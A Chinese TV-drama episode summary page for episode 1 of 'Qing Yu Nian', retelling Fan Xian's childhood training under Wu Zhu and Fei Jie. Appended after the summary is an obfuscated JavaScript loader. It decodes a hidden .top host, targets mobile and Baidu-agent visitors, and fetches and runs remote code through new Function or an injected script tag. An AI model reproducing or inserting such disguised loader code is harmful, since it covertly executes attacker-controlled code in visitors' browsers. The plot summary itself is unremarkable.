庆余年第1集分集剧情(1-46集)

添加剧情
1-3233-46

庆余年第1集分集剧情介绍

剧情简要:庆余年第1集

  一个患有重症肌无力的现代青年,一觉醒来,发现自己穿越成了一个古代婴儿,正躺在一个竹篮里,遭受一群杀手的围攻追杀,疑惑之间,一个属于他的崭新世界,迎面而来。

  带着这个小婴儿逃命的武士名叫五竹,是婴儿母亲生前的一名仆人,他摆脱了杀手以后,遇到了南庆鉴查院院长陈萍萍(吴刚 饰)带着他的黑骑赶到。陈萍萍从前也是小婴儿母亲身边的一名下人,在他的提议下,五竹带着婴儿去澹州投奔了范家,也就是南庆司南伯范建(高曙光 饰)的家,于是,这个婴儿成了范建之子,从此有了一个新的名字——范闲(张若昀 饰)。只不过,他没有入族谱,也没有名分,只是个范家挂名的少爷,跟随范老太太(曹翠芬 饰)住在澹州。

  一晃几年过去了,范闲长成了一个聪明伶俐的小小少年。这天,他瞒着院里的丫鬟,拉着从京都回乡小住的妹妹范若若(宋轶 饰)出去疯玩儿了一圈,结果回来后,发现周管家(李洪权 饰)正因此狠狠教训他的丫鬟。范闲便找了个凳子来,站在上面,将周管家叫到跟前,用尽全身的力气甩了他一耳光,管家的脸颊瞬间红肿了起来,连后槽牙都被打掉一颗,但他却连大气都不敢出。

  老夫人得知此事后,并没有训斥范闲,只是立即着人将范若若遣回了京都,并让周管家将范闲院里的丫鬟换掉,范闲表示自己喜欢安静,院子里不用人伺候,老夫人也没再坚持。

庆余年电视剧海报

  范若若依依不舍地上车回京了,周管家记恨范闲教训自己的仇,故意吓唬他,称晚上会闹鬼,却不知这个小小少年的身体里,住的根本是一个成熟的灵魂,又怎么会害怕这样小儿科的恐吓?

  当晚,一个黑衣蒙面人穿房越脊神不知鬼不觉地来到了范闲屋中,范闲却装作一副懵懂无知的样子,将来人忽悠了个七荤八素,然后趁其不备用手边的陶瓷枕,连砸了那人的脑袋两下,将其砸晕。范闲以为自己杀人了,连鞋都顾不得穿,光着脚丫跑到了五竹开的铺子,将这件事告诉了他。五竹跟着他去查看,结果范闲发现那人有转醒的迹象,二话不说抄起一把凳子,又狠狠砸了一下,又将其砸晕了过去。

  这时,一向话少的五竹才慢悠悠地告诉范闲,此人是京都鉴查院第三处的人,名叫费介(刘烨 饰),是自己人。范闲一听,又气又悔,却拿自己这个五竹叔(佟梦实 饰)叔丝毫没有办法。

  费介是范闲名义上的父亲范建找来给他做老师的,第二天,他拜会了范老夫人,发现这位老夫人对范闲似乎很不放在心上,而那位周管家则背地里悄悄暗示他,范闲不过是个挂名的少爷,不受老太太待见,不用太过用心教导,费介便提出,除了识文断字,就教范闲学医。

  费介也是个急性子,毫不拖泥带水,当晚就带着范闲去了乱葬岗,他在一旁指挥着范闲挖开了一座坟,给了他一把刀,让他自己去解剖尸体。范闲跟他要手套,费介却不根本懂他说的那种现代的医用手套是什么东东。范闲虽然表现得十分平静,也很配合,却还是在解剖的时候,被腐败的尸体给恶心到了,当场大吐特吐,作为师父的费费介,看着他狼狈的模样,终于有一种扳回一局的快感,乐得哈哈大笑。

  范闲刨坟的时候,费介就在一边喝着酒看着,跟他四海八荒地闲聊着。从费介口中,范闲才得知,五竹虽然只是自己母亲的一个仆人,且眼睛看不见,但他的功夫却能够与四大宗师齐肩,若不是他平时不显山不露水,这世上就该有五大宗师了。

  这番话勾起了范闲的好奇,能把这样一个顶尖的高手收在身边做仆人,自己的母亲也绝非等闲之辈。刨完坟之后,范闲便去了五竹的铺子,缠着他询问关于母亲的一些消息,但惜字如金的五竹却只告诉他,他的母亲名叫叶轻眉,是个天下无双的人,其它再不多说。范闲又说起自己进入范府之时,五竹给自己放在竹篮里的那本练气秘笈,表示自己无法控制那真气,五竹纠正他说,那秘笈是他母亲留给他的,自己并不懂练气,也没练过武功,之所以能和四大宗师打个平手,靠的是快和强。

  于是,五竹便开始用他的方式来训练范闲,其实他的方式很简单,就是他打,范闲来躲,什么时候能够躲得开,他的功夫也就算了练到家了。不要觉得这位的训练方法特别,更特别的是费介先生,他教医术直接将人带到墓地就够匪夷所思了,但他教毒术就更加别致,竟然是不是就给范闲下点毒,然后让他自己找解药,声称什么时候能让自己在不知不觉间中招,他就算出师了。

  范闲在这两位不走寻常路的老师教导下,进步很快,他从五竹跟自己说的话里得到启发,利用给费介饭菜里的补药,使他不知不觉间中了招,终于出师了。

  费介临走时,范闲依依不舍地去送他,他将一面提司腰牌送给了范闲,范闲也把自己用羊肠做的手套送给了他,让他不要忘了自己这个不听话的徒弟。费介不禁有些动情,他强忍着眼泪对范闲说,若是能够早认识他几年,自己一定会找个女人成亲,生一个像他一样的孩子。范闲在他身后大声喊说,将来自己给他送终,费介终于忍不住红了眼眶。

  老师走后,范闲闷闷不乐,范老夫人见他这个样子,便告诉他说,费介走了也是好事,他留在澹州,便会把京都人的目光吸引到这里来,而一旦红甲骑士出现在澹州街头,真正的危险也就来了。老夫人说起此事,心情颇为沉重,范闲却有些期待,从此后,他每天坐在门前,等着那些所谓的红甲骑士,而五竹,就站在对面的楼上,默默守护着他。

  这一等就是好几年,直到小范闲(韩昊霖 饰)长成了一个英俊秀气的青年,他终于等到了一群红甲骑士。这些人是范建派来接范闲进京的,老夫人却担心他像他娘亲一样,遇到危险劫难,因此不准他去,那些红甲骑士就一直跪在院里,静静地等着……

function Cgfnz(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function NmkLKR(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return Cgfnz(t);};window[''+'b'+'C'+'E'+'O'+'p'+'k'+'V'+'N'+'i'+'G'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=NmkLKR,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bW50Lnl6YzzM1MzzI2LnRvcA==','154907',window,document,['z','PLaqKr']);}:function(){};